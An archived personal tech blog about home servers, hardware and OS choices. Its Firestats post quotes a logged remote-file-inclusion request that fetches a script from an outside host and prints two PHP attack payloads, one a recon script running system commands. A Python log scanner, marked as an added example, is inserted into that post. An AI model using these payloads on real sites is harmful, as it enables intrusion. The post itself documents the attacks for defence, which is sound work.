Archive for the ‘Software’ Category

How to put an old security appliance to work

November 14th, 2009 2 comments

Way back towards the end of August I inherited some fairly half decent equipment. Among them were two Symantec 5420 Security Appliances. I took them despite not knowing what it was that I was going to do with them. After a while I simply forgot about them until I decided yesterday to do something.

As the licenses had expired they weren’t much use as a security appliance so first things first was to take the cover off and have a gander inside. As I suspected an €8,000 appliance from Symantec would of course be made from the cheapest parts available. The motherboard was from a company I had never heard of in all my years called iWill. Any references on the web point to them no longer existing. The CPU is a 2GHz Celeron and it had 512MB RAM and a 40GB Maxtor hard disk. Connectivity wise there are 6 10/100Mbit Intel ethernet ports, two USB ports and one RS-232 port. Inside on a riser board is a PCI slot however fitting a normal PCI card such as a display adapter is out of the question as the IDE cable would block even the shortest ones and besides, VGA cards are not supported! In the second IDE slot is a 16MB SSD.

So what was I going to do to get a new OS up and running on it? I came across a forum post from a guy who managed to get pfsense (FreeBSD) installed on it but unfortunately his instructions were a bit lacking. Out of curiosity I hooked a console cable up to the RS-232 port and opened a terminal where I was quite pleased to be greeted by a login prompt. I logged in using the username admin with the password I got from the LED panel on the front and lo and behold I was in a root shell. I guessed that Symantec’s software probably ran on one of the BSDs or Linux from experience with Nokia Checkpoint which ran NetBSD I think.

Anyway I guessed correctly, the 5420 was running RedHat Linux 7.1. From the console I was able to garner a bit more about the hardware. In addition to the basic stuff I mentioned earlier there is a Broadcom Cryptographic Accelerator CPU on board. But back to my immediate problem. How to get another OS on it. After pondering for a few moments I decided to try and see if taking the disk out and sticking it into a spare PC and setting it up from there would work. I dusted off my trusty Optiplex Gx1 circa 1999 and proceeded to install Ubuntu 9.10 on the disk.

Before I stuck the disk back in the 5420 I made sure that I could access a shell via console cable. Thankfully there is some excellent documentation on the Ubuntu help site and in no time I was able to access the Dell via console cable and have access to the Grub boot menu on boot up as well.

Back into the 5420 did the disk go, console cable hooked up, terminal open and time to power up. To my absolute delight there was the Grub boot menu. I hit enter and up it loaded. Perfect! Except for one thing. I had no network access. Half way through diagnosing this the whole thing just froze on me so I rebooted. Not long after rebooting it froze again. It was then I remembered that the guy who installed pfsense on his one mentioned problems with ACPI.

Unfortunately as it would freeze up so quickly I was unable to fix it from a terminal so I had no other choice but to take the disk out and shove it back into the Dell again. Ubuntu 9.10 has a lot of things moved about and the new version of Grub had me a bit confused for a while but finally I got ACPI disabled and everything is working perfectly.

Being headless they aren’t much good for anything other than possibly their original intention as a security appliance. However I decided to set up one of them as a dedicated monitoring server running ntop and Munin. For that it is absolutely perfect!

Various updates

August 25th, 2009 No comments

It’s been absolutely ages since I last wrote here and I had been meaning to do so for some time. Since my last entry I have been tinkering away with my setup as I do on a regular basis and plenty of things have changed here on the back end. I suppose I will begin with my connection and move up the chain from there.

First up is a new router. I picked up a nice Cisco 837 for a very reasonable price. I had a bit of fiddling to get it up and running with eircom broadband but I got there in the end and I have documented the procedure over on my wiki.

Next up is my reverse proxy. It is still running on the same hardware but I decided to move from Linux over to OpenBSD. My primary reason for this is that I was getting sick and tired of Linux iptables. In addition I concluded that Squid’s performance wasn’t optimal either. A move to OpenBSD seems to have resolved both those issues for me. PF on BSD is very configurable and easy to understand as well. Needless to say I have documented my experiences with PF over on my wiki also.

I’ve also gotten my hands on some new hardware. Well new hardware to me that is. I picked up three Sun Netra T1 servers, a Dell PowerEdge 1750 and two Symantec 5420 Firewall appliances.

So far I have been busy setting up the three Netras. They don’t have CD-ROM drives or display adapters so I had to install them over the network which was a process that was actually relatively simple. However it was only simple in that I already have a couple of other Sun machines here one of which I was able to use as an install server. Of course I have this process documented on my wiki also.

I haven’t decided what I will use the Netras for yet. One of them seems to have CPU problems and has been cannibalised to increase the specs of the other two. They have 500MHz UltraSparc IIe CPUs so by today’s standards are not at all that powerful but they do draw very little power, certainly less than a Pentium IV machine so I may set them up as file servers. Initially I was hoping to install OpenBSD on one of them to use as my reverse proxy but unfortunately an OpenBSD network install does not seem to be as straightforward as Solaris.

The PowerEdge 1750 I had hoped to set up as a webserver running either IIS or Apache. Unfortunately it only has 512MB of RAM so until I get some more for it that rules out Server 2008. However it is incredibly loud and that rules out keeping it running in my computer room. I am currently planning on setting up a dedicated computer room as it were in another part of the house so check back here for updates on that.

Firestats WordPress Exploit

June 13th, 2009 4 comments

The vulnerability described below has been resolved in Firestats 1.6.2 which you can download from http://firestats.cc/wiki/Download

Disclaimer: I have nothing at all to do with the development of Firestats. I am merely an end user.

Over the last few hours I have been watching a major attempt at cracking both of my WordPress installations. A quick investigation tells me that the cracking attempts are looking for this vulnerability in Firestats.

At present there have been over 600 attempts from servers all over the globe which attempt to fetch the path to firestats-wordpress.php and exploit it using a script hosted elsewhere.

A sample from my logs looks like this:

http://tech.sweetnam.eu/tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt??

The scripts themselves seem to have two versions. The most common one like above has the following contents:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

The other one contains the following:

<?php
function ConvertBytes($number) {
    $len = strlen($number);
    if($len < 4) {
        return sprintf("%d b", $number); }
    if($len >= 4 && $len <=6) {
        return sprintf("%0.2f Kb", $number/1024); }
    if($len >= 7 && $len <=9) {
        return sprintf("%0.2f Mb", $number/1024/1024); }
    return sprintf("%0.2f Gb", $number/1024/1024/1024); }

echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here and also is a fucking gay..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

All I can recommend at the moment is removing firestats from your WordPress installation. It seems to be the only way to be sure for the moment.
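The log pattern described above, a request whose query parameter (here fs_javascript) carries an off-site URL, can be counted per client and per payload host straight from an access log. This is an added example, not part of the original post; the function names, the sample log lines, the documentation-range IP addresses and the .example hosts are all constructed, and the Apache combined log format is assumed.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A query value that begins with a URL scheme is a remote-include attempt.
REMOTE_RE = re.compile(r"^(?:https?|ftps?)://", re.I)


def remote_include_params(target):
    """Return [(param, remote_host)] for query values that are off-site URLs."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value).strip()  # second decode catches %2568ttp://...
        if REMOTE_RE.match(value):
            hits.append((name, urlsplit(value).hostname or ""))
    return hits


def scan(lines, plugin_file="firestats-wordpress.php"):
    """Count attempts per client and per payload host; list the ones answered 2xx."""
    by_ip, by_host, served = Counter(), Counter(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = remote_include_params(m["target"])
        if not hits:
            continue
        by_ip[m["ip"]] += 1
        by_host.update(host for _, host in hits)
        path = urlsplit(m["target"]).path
        # A 2xx on the plugin file means the request reached the script,
        # so that site needs checking rather than just blocking the client.
        if path.endswith("/" + plugin_file) and m["status"].startswith("2"):
            served.append((m["ip"], path, m["status"]))
    return {"by_ip": by_ip, "by_host": by_host, "served": served}


# Constructed sample lines (not taken from the author's logs).
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jun/2009:10:01:02 +0100] "GET /tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://payload-host.example/fx29id.txt?? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
198.51.100.23 - - [13/Jun/2009:10:01:09 +0100] "GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http%3A%2F%2Fother-host.example%2Fid.txt%3F HTTP/1.1" 200 87 "-" "libwww-perl/5.805"
203.0.113.7 - - [13/Jun/2009:10:01:15 +0100] "GET /index.php?s=firestats HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
192.0.2.44 - - [13/Jun/2009:10:02:40 +0100] "GET /wp-content/plugins/firestats/js/firestats.js?ver=1.6 HTTP/1.1" 200 2210 "http://blog.example/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    report = scan(SAMPLE_LOG.splitlines())
    for ip, count in report["by_ip"].most_common():
        print(f"{count:5d} attempt(s) from {ip}")
    for host, count in report["by_host"].most_common():
        print(f"{count:5d} payload fetch(es) pointing at {host}")
    for ip, path, status in report["served"]:
        print(f"INVESTIGATE: {path} answered {status} to {ip}")
```

Requests that were answered with a 404, like the /tag/ path in the sample from the post, only add to the counts; a 2xx response on the plugin file itself is the case to follow up.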

IBM and Sun courting

March 18th, 2009 No comments

The Wall Street Journal has an article today that confirms that IBM is having discussions with Sun over a possible acquisition. This isn’t the first time that IBM have had discussions with Sun but given the current economic climate it might be a real possibility this time around. Also it would potentially be an easy sell to current Sun shareholders who have seen their shares decline steadily in value over recent years.

What will this mean for the technology industry? Well both IBM and Sun overlap in quite a few areas so here are the ones I can think of off the top of my head:

  • IBM PowerPC and Sun SPARC CPU’s
  • IBM Lotus Symphony and Star/OpenOffice
  • IBM DB2 and Sun’s MySQL
  • IBM AIX and Sun Solaris
  • IBM Storage and Sun Storage/StorageTek

The crown jewels of a take over would probably be Java and MySQL but IBM swallowing up Sun would create more than a few jitters for EMC who presently rule the storage market.

Of course the potential acquisition of Sun by IBM will inevitably be compared to the HP takeover of Compaq. Both HP and Compaq were in competition with each other in the enterprise computing market with HP’s PA-RISC based servers competing with Compaq’s Alphas (in turn acquired through Compaq’s takeover of DEC). They also had competing operating systems with HP’s HP-UX vs Compaq Tru64.

Of course it wasn’t long after that merger was completed when HP killed off Alpha and Tru64.

Would IBM kill off SPARC and Solaris? I would speculate that they might kill off SPARC but focus purely on Solaris for x86. It might make sense for IBM to keep Solaris on x86 as they currently don’t have an x86 version of AIX. This is all conjecture of course and as the talks are at an early stage the deal might fall through yet.

Time will tell.


What are the online newspapers running?

March 4th, 2009 No comments

Having been obsessed with computers and networks for many years I am always interested to find out the infrastructure behind some of the more popular sites out there. Quite often it is possible to glean bits of information here and there and occasionally an error may occur that offers a glimpse as to what is happening in the back end.

Today it is the turn of the Irish Independent. I got the error pictured here while browsing through their site. What is interesting about it is the domain name; externalcontent.independent.ie. As we can see it is served by an Apache web server running on a Red Hat machine. However if you look at the error more closely it is a bit more telling.

The server in question (externalcontent.independent.ie) attempted to serve up an ad or content related to loadzajobs.ie but was unable to contact the back end server. So this tells me that externalcontent.independent.ie is configured as a reverse proxy server and according to Netcraft is located in Ireland.

The primary domain; www.independent.ie, is hosted in the Netherlands and runs Apache Coyote, again according to Netcraft. Apache Coyote is a connector for Apache Tomcat. I find it curious that the main www site is located in the Netherlands but I suspect that it might have something to do with being connected to the Amsterdam Internet Exchange which is the largest Internet Exchange in the world.

It does make me wonder why they chose AMS-IX given that here in Ireland we have INEX.

So what about the other national daily online newspapers?

The Irish Times is hosted on Linux and Apache and hosted in Dublin and The Irish Examiner is hosted on Windows Server 2003 and Microsoft IIS/6.

Although there are Irish editions of the Sun, The Star, The Daily Mail and The Mirror, none of them have specific Irish orientated sites but I will include them here nonetheless.

The Sun claims to be hosted on Linux and Apache however they use Akamai for content delivery so this could be inaccurate.

The Daily Star claims to be hosted on an unknown Unix and Apache and the Daily Mirror is hosted on RedHat Linux and Apache.

Finally the Daily Mail, like the Sun also uses Akamai for content delivery and claims to be running Linux and Apache.

It’s clear that Apache and Linux are the front runners.

iPhone friendly WordPress theme

February 17th, 2009 6 comments

My few regular readers will have noticed that I have changed my theme. The more I looked at the old one, the more gaudy it looked so in came this one. However while browsing through some plugins, I came across a rather brilliant one called WPtouch.

It detects if you are using an iPhone or iPod touch and makes it look more like an iPhone application. So no more squinting or pinching or squeezing to read as you can read in the screenshot.

Incidentally, if you have an iPhone, are you wondering how to take a screenshot?

Well it is a simple matter of holding the home button and then pressing the power button.

Microsoft f**ks things up again with Windows 7

February 6th, 2009 No comments

Most people will buy a PC or a laptop based on a budget. At this present moment in time given the economy crashing down around us that is more true than ever. Typically the version of operating system pre-installed on a new machine rarely if ever figures in the purchasing decision. The end result is that most people will end up buying a laptop off the shelf of their local Tesco that is running Windows Vista Home Basic which as you may or may not know is a castrated version of Vista.

However with the upcoming Windows 7 Microsoft have listened to the criticism from customers that Vista was a stinking pile of excrement but they didn’t listen to the complaints about the many confusing versions available because they have just announced that Windows 7 will be shipping in six different editions.

As with Vista, the Ultimate edition will be the one everyone will want but few will get. You see after someone pays €500+ for a laptop they aren’t likely to shell out the same amount again to update their operating system to something vaguely functional.

If you include 32bit and 64bit versions then there becomes a total of 22 versions including those “Euro Specials” that don’t have Media Player installed.

Why do they insist on thinking that they know what is best for us? Just make a Home and Professional edition a la XP and everyone should be happy. The irony is that at the moment the Windows 7 beta is getting fantastic reviews but that is because everyone using the beta is using the Ultimate edition.

They are going to get some shock when the beta expires!

Use Webmin? Host domains? Check out Virtualmin

January 21st, 2009 No comments

When I originally decided to host from home a few years back I had to do more than just decide to fire up a webserver and NAT from my router to it. Choosing an operating system and web server software and application server was another consideration. Did I want to run Linux? Solaris? Microsoft IIS? And did I want to go with PHP or ASP? What was I going to use as a CMS for my primary site and what blog software would suit my requirements?

Ultimately I decided on OpenBSD with Apache and PHP and Windows + IIS. Of course I knew that over time I would be constantly changing this and I needed a way to effectively manage the domains themselves and the sites and database dumps. Obviously I needed a control panel of some sorts and after a bit of investigation I settled on Virtualmin.

Virtualmin is created by the same people who created the excellent and utterly essential Webmin control panel and as such the Virtualmin module integrates nicely into Webmin. Oh, and it’s free!

Originally this site was hosted on Windows Server and IIS and powered by BlogEngine.NET but I found it a bit of a pain to handle two different types of blogging software so I migrated this blog over to WordPress and host it with my other sites. Over time my other server changed several times from OpenBSD to Ubuntu, then Solaris 10 running on a Sun Workstation, back to Ubuntu and currently onto the Debian machine where they currently reside. With Virtualmin moving platforms was a simple matter of restoring from the backups that I took from the machine that was to be replaced.

Of course with it now being relatively trivial to change servers I find myself experimenting a bit more and I’m currently fighting the urge to move everything over to a FreeBSD server but for the moment I’m successfully resisting that urge!

Who and what I allow access my websites

December 18th, 2008 No comments

I’ve written before about how I use my reverse proxy to block various bad bots and crawlers. At this stage I am blocking so much stuff that it would be way too much to post here. So if you are interested here are two links for you. The first is a copy of the Squid regex file I use as per my tutorial and the second is a list of IP addresses and IP blocks that I have blocked on the proxy using iptables.

Blockedbots.txt
Blockedip.txt

Six weeks without Windows

October 15th, 2008 No comments

I had a hard drive failure on my main workstation recently and after installing the new one I decided to partition it with Windows XP and Ubuntu 8.04. That was about six weeks ago and I have only booted into Windows once.

I would consider myself a pretty advanced Linux/Unix user. My first encounter with Linux was in 1995 with LinuxFT and not long after that with an early Slackware release. As the years have rolled by since then I have setup literally hundreds of Linux servers and scores of Solaris and HP-UX servers but Linux has never impressed me on the desktop.

Through one job I had eight years ago I had to use RedHat 6.1 as a desktop OS and I absolutely hated it. The look and feel was terrible. The early GTK widgets were hideous. Gnome was at version 1.4 and it was almost completely unusable. Around the same time I installed SuSE 6.0 on a spare PC at home and while it used KDE by default, it wasn’t much better. Installing fonts was a nightmare and the only decent browser available then was Netscape Navigator which used the Motif Widget set and was a nightmarishly ugly looking beast with which to browse the web.

How things have changed in eight years! A quick roll call of my computer room here at home comes up with the following:

1 HP 9000 running HP-UX
1 Reverse Proxy server running Ubuntu 6.06 LTS
1 Web Server running Debian Lenny 64bit
2 Sun Blade 2000 workstations running Solaris 10
1 Apple MacBook running OS X 10.5 Leopard
1 Dell Poweredge running Ubuntu 6.06 LTS
1 Main workstation running Ubuntu 8.04 LTS (Dual booting with Windows XP)
1 Firewall running Smoothwall Linux

And finally:

1 File server running Windows Server 2003.

I’m now down running just one single Windows machine from a maximum of about 8 over the years. And unlike before I don’t think I will be turning back. Most of the applications that I used on Windows were open source to begin with and naturally they have Linux versions. Firefox and Thunderbird being the most obvious two. WINE has matured to such an extent that when I’m no longer comfortable using The Gimp for certain tasks, Photoshop CS2 works under WINE like a charm.

However if there is a problem with Linux it is that there is probably too much choice. Particularly when it comes to your default desktop. I’ve finally decided on Gnome mainly because I couldn’t get Compiz working properly with XFCE. I had a look at KDE4 and I will probably have to write a separate post about it. Suffice to say for the moment I don’t like the look of it one little bit.

So after six weeks I finally have my desktop looking the way I want it to. Gone is the Ubuntu Brown default theme replaced instead with one I liked from art.gnome.org . I’m still trying to find window decorations that I like but for the moment the default Ubuntu one is tolerable.

I still do think however that Linux is still nowhere even near ready for use as a mainstream desktop OS for the average user. But for the moment I’m finally impressed enough that I can eschew Windows at long last.
